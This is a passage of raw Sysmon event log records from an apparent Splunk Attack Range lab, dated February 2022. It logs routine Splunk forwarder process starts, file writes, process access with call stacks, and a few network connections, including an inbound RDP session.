Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B3D336F3136581306B08036AA0BB464,SHA256=CFAE7751A45331EF8FAE8E7C653060940B5EE0CC8993FADBCCA8228FF49C4D34,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000294570Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:00.046{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23B35601C9E07BCAF3F6665C9182F51C,SHA256=9E49CE685805CAF72920A4BE5485241B25D1B62979D3D6814DA9F7DEBA49432B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218858Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:01.504{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C293383049D736CAC9D6DB7191F32D3,SHA256=41335524E806059F5339B1539DEEDF653EB5BC274B5D3C35F0D46074CD4A821E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294582Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:01.913{C8EA50B7-1465-6216-9806-000000003802}7112900C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294581Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:01.612{C8EA50B7-F11F-6215-0D00-000000003802}8883340C:\Windows\system32\svchost.exe{C8EA50B7-F2AC-6215-B700-000000003802}4292C:\Windows\System32\rdpclip.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+fa21|c:\windows\system32\rpcss.dll+d6ee|c:\windows\system32\rpcss.dll+b877|c:\windows\system32\rpcss.dll+85f7|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000294580Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:02:58.620{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49154-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x8000000000000000294579Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:01.480{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1465-6216-9806-000000003802}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294578Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:01.480{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294577Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:01.480{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294576Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:01.480{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294575Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:01.480{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294574Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:01.480{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1465-6216-9806-000000003802}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294573Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:01.480{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1465-6216-9806-000000003802}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294572Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:01.482{C8EA50B7-1465-6216-9806-000000003802}7112C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294571Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:01.054{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=137CC7E2EA38D07B860092162AB6D702,SHA256=AB62005FF8894684577B4BE169052034334D17E0F619EB9CE08144A171878AE0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000218859Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:02.519{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6BA63E37396BDBC9ACD4EEED39AE2D63,SHA256=C3AE2A94628FF4E7665B6952F4520A1D6BD1912B198583292DB3DE4FA4A77DA1,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294591Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:02.367{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1466-6216-9906-000000003802}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294590Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:02.367{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294589Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:02.367{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294588Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:02.367{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294587Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:02.367{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294586Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:02.367{C8EA50B7-F11C-6215-0500-000000003802}4122608C:\Windows\system32\csrss.exe{C8EA50B7-1466-6216-9906-000000003802}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000294585Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:02.367{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1466-6216-9906-000000003802}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000294584Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:02.369{C8EA50B7-1466-6216-9906-000000003802}2280C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000294583Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:02.067{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DFDC992862832FB9DF8349B0D9DEA1F,SHA256=24341EC537EC97C73E1CC13FF8FC9F181FD1E82150A9CEA2836A07D5159846F4,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000218861Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:01.155{4F8D34B0-F11C-6215-1000-000000003902}940C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse187.141.52.101customer-187-141-52-101-sta.uninet-ide.com.mx61754-false10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal3389ms-wbt-server 23542300x8000000000000000218860Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:03:03.535{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6FCF5C86171E0A3FBCD1210AE8817D9,SHA256=DC35E7A154AF219E3DBDD83055B0E0857903855E8A95283513F883B484FD620B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000294600Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:03.976{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1467-6216-9A06-000000003802}2216C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294599Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:03.976{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294598Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:03.975{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294597Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:03.975{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294596Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:03.975{C8EA50B7-F11F-6215-0C00-000000003802}8286016C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000294595Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:03:03.974{C8EA50B7-F11C-6215-0500-000000003802}412428C:\Windows\system32\csrss.exe{C8EA50B7-1467-6216-9A06-000000003802}2216C:\Program 